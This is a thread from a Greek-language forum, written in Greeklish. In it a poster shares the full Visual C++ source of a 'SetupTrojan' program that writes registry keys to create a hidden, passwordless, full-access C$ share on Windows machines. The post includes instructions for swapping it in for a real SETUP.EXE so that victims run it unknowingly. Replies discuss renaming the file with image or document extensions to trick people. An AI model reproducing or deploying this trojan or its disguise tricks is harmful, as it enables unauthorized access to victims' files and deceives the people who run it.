trojan ligo diaforetiko ...

[Gary]

apo ti selida <A HREF="http://www.netninja.com" TARGET=_blank>www.netninja.com</A> <P>katebasa ena trojan - to setuptrojan - diabaste analytika - to egrapse o enigma - kai to download den perilambanei to programma alla ton pagaio kodika kai boreite na to kanete compiling me tin Visual C++ <BR>/*********************************************************************\<BR> SetupTrojan.cpp<BR> A Trojan Horse written by enigma <[email protected]><BR> This source code is provided to the public domain. <P> This program will add a hidden share to a user's machine--the share<BR> has no password and full security permissions. To access the share,<BR> one must be on the same LAN; from Start Menu/Run type <BR> \\computername\c$<BR> (where computername is the victum computer's network name). <BR> Please note: this share will occur only AFTER their system reboots.<BR> Good thing that most install programs require you to reboot!<P> Installation: Compile this program into an executable (a nice touch<BR> would be to add a generic setup item to the program's resources).<BR> Locate the "SETUP.EXE" program in the installation you wish to<BR> infect. Rename it to "SETUP.___" and copy/rename this program <BR> to "SETUP.EXE". When the user double-clicks on the setup icon, it<BR> will run this trojan, which will then run the real setup program<BR>\*********************************************************************/<P>#include <windows.h><BR>#include <process.h><P>//This is the file name of the REAL setup program (the one that this<BR>//trojan should call. It is interesting to note that it can have ANY<BR>//extension--as long as the file's header isn't damaged, the OS will<BR>//recognize it as being an executable.<BR>#define PROGRAM_TO_RUN "setup.___"<P>//This function will check if "user level" or "password level" shares<BR>//are currently use.<BR>BOOL userLevelSharingActive(void)<BR>{<BR> HKEY key;<BR> DWORD type;<BR> BYTE buffer[30];<BR> DWORD len = sizeof(buffer);<P> RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Security\\Provider", 0, NULL, &key);<BR> RegQueryValueEx(key, "Platform_Type", 0, &type, buffer, &len);<BR> RegCloseKey(key);<BR> if (buffer[0] == 0x02)<BR> return TRUE;<BR> return FALSE;<BR>}<P>void insertShare(void)<BR>{<BR> HKEY key;<BR> DWORD returnCode;<BR> DWORD flags;<BR> char path[] = "C:\\";<BR> char remark[] = "";<BR> DWORD type = 0;<BR> unsigned char securityMask[2] = {0xFF, 0x80};<BR> BOOL userLevelSharing;<P> //Determine what the flag needs to be--different for the two sharing methods<BR> if (userLevelSharing = userLevelSharingActive())<BR> flags = 0x193 | 0x200;<BR> else<BR> flags = 0x102 | 0x200;<P> //Create/Open a key for the local path "C:\". We will be calling<BR> //it "C$", so it won't appear on the browse lists. If it can't be<BR> //opened, there is a problem (maybe it's being run on WinNT?)<BR> if (RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$", <BR> 0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, &returnCode) != ERROR_SUCCESS)<BR> return;<BR> //Make it read/write/system-hidden<BR> RegSetValueEx(key, "Flags", 0, REG_DWORD, (BYTE *)&flags, sizeof(flags));<BR> //No passwords<BR> RegSetValueEx(key, "Parm1enc", 0, REG_BINARY, NULL, 0);<BR> RegSetValueEx(key, "Parm2enc", 0, REG_BINARY, NULL, 0);<BR> //Let's see...what do we want to share...?<BR> RegSetValueEx(key, "Path", 0, REG_SZ, (BYTE *)path, sizeof(path));<BR> //"No comment."<BR> RegSetValueEx(key, "Remark", 0, REG_SZ, (BYTE *)remark, sizeof(path));<BR> //It's a share of type "File" (0)<BR> RegSetValueEx(key, "Type", 0, REG_DWORD, (BYTE*)&type, sizeof(type));<BR> //Free the handle<BR> RegCloseKey(key);<P> if (userLevelSharing)<BR> {<BR> MessageBox(NULL, "User Level Code Reached", "", 0);<BR> //For user-level sharing, there is one additional step that needs<BR> //to be done--This is the same as dragging the "Everyone" world<BR> //icon into the "Custom" bin and toggling on all of the checkboxes<BR> if (RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Security\\Access\\C:", <BR> 0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, &returnCode) != ERROR_SUCCESS)<BR> return;<BR> if (returnCode==REG_CREATED_NEW_KEY)<BR> MessageBox(NULL, "Created new key", "", 0);<BR> else if (returnCode==REG_OPENED_EXISTING_KEY)<BR> MessageBox(NULL, "Opened existing key", "", 0);<P> RegSetValueEx(key, "*", 0, REG_BINARY, (BYTE *)securityMask, 2);<BR> RegCloseKey(key);<BR> }<BR>}<P>int WINAPI WinMain( <BR> HINSTANCE hInstance, // handle to current instance <BR> HINSTANCE hPrevInstance, // handle to previous instance <BR> LPSTR lpCmdLine, // pointer to command line <BR> int nCmdShow // show state of window <BR>)<BR>{<BR> //Perform the nasty-work<BR> insertShare();<BR> //Chain to the REAL setup program<BR> spawnlp(_P_OVERLAY, PROGRAM_TO_RUN, PROGRAM_TO_RUN, NULL);<BR> return 0;<BR>}<BR><P>------------------<BR>My name is Hobson <BR>Gary Hobson

[A-Ge0]

auto apla anoigei ta shares kai kaneis meta meso entolon (nthack mou fenete legetai), alla pali prepei na to treksei kapios, opote an einai na to treksei giati den tou dineis ena authentic trojan?<BR>de ksero an me katalabes...

[Gary]

fysika kai se katalaba kai ego gnosi gia ta Share ton NT - to kalo omos einai oti dineis oti katalixi thes sto arxeio px "setuptrojan.bmp" i "setuptrojan.doc" kai etsi psiloxegelas toys "dyspistoys" <P>episis na po oti o enigma (den xero an eidate tis foto toy sto site toy) einai epaggelmatias programmatistis se Visual C++ kai doyleyei se megali eteria logismikoy - <P>------------------<BR>My name is Hobson <BR>Gary Hobson

[A-Ge0]

sigoura an to metonomaseis se .bmp kanei ti douleia? ligo parakseno, to exeis dokimasei??

[sh4dow]

ti mou thimisate re seis, mia malakismeni (xeni) pou elege se mia alli na min parei ena arxeio txt apo ena filaraki giati itan virus xixi. afou tin kraxame oloi mas ekane ban <IMG SRC="http://www.insomnia.gr/cpubb/smilies/cwm44.gif" border=0> <BR>sigedrosou

[jesiko]

agaphte GARY<BR>TRABA STO SPITI SOY!!!<IMG SRC="http://www.insomnia.gr/cpubb/smilies/cwm21.gif" border=0>

[SpY]

Nai ontos paidia apo tin stigmi pou to onomazeis opos thes esi mporeis eukola na psaroseis ton allon <IMG SRC="http://www.insomnia.gr/cpubb/smilies/cwm11.gif" border=0> <P><BR> -= SpY =-

[sh4dow]

<BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by SpY:<BR><B>Nai ontos paidia apo tin stigmi pou to onomazeis opos thes esi mporeis eukola na psaroseis ton allon<BR> -= SpY =-</B><HR></BLOCKQUOTE><P>den nomizo na mas kaneis ban kai esy tora ...<BR><P>------------------<BR>EDgSTr5SmDY=

[Gary]

<BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by jesiko:<BR><B>agaphte GARY<BR>TRABA STO SPITI SOY!!!<IMG SRC="http://www.insomnia.gr/cpubb/smilies/cwm21.gif" border=0> </B><HR></BLOCKQUOTE><P>tha aneboyn ta asterakia soy mi biazese kai min kaneis malakies post <IMG SRC="http://www.insomnia.gr/cpubb/smilies/cwm23.gif" border=0> <P>paidia to dokimase kanenas doyleyei ??

[placid]

exei dikio o gary .. den peirazei apo ton aprilio ekane register o filos mas.. kai go sthn arxh etsi prepei na eimouna (de thimamai ki olas.. ) den exei katalabei to klima toy forum akoma to paidi.. 1h kai sygxoremenh<P>------------------<BR>Κάνε όνειρα για να ζεις. Αν δεν ονειρεύεσαι είσαι χαμένος..<BR>Φιλικά<BR>MaJoR_K

[Gary]

<BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by Anonymous:<BR><B>exei dikio o gary .. den peirazei apo ton aprilio ekane register o filos mas.. kai go sthn arxh etsi prepei na eimouna (de thimamai ki olas.. ) den exei katalabei to klima toy forum akoma to paidi.. 1h kai sygxoremenh<P></B><HR></BLOCKQUOTE><P><BR>xthes ekane register kai malista piga ego spiti toy kai toy edeixa ta katatopia <P>allios a mathene pote tin insomnia na moy tripiseis ti miti <BR><P>------------------<BR>ειναι τρελοί αυτοι οι ινσομνιάκες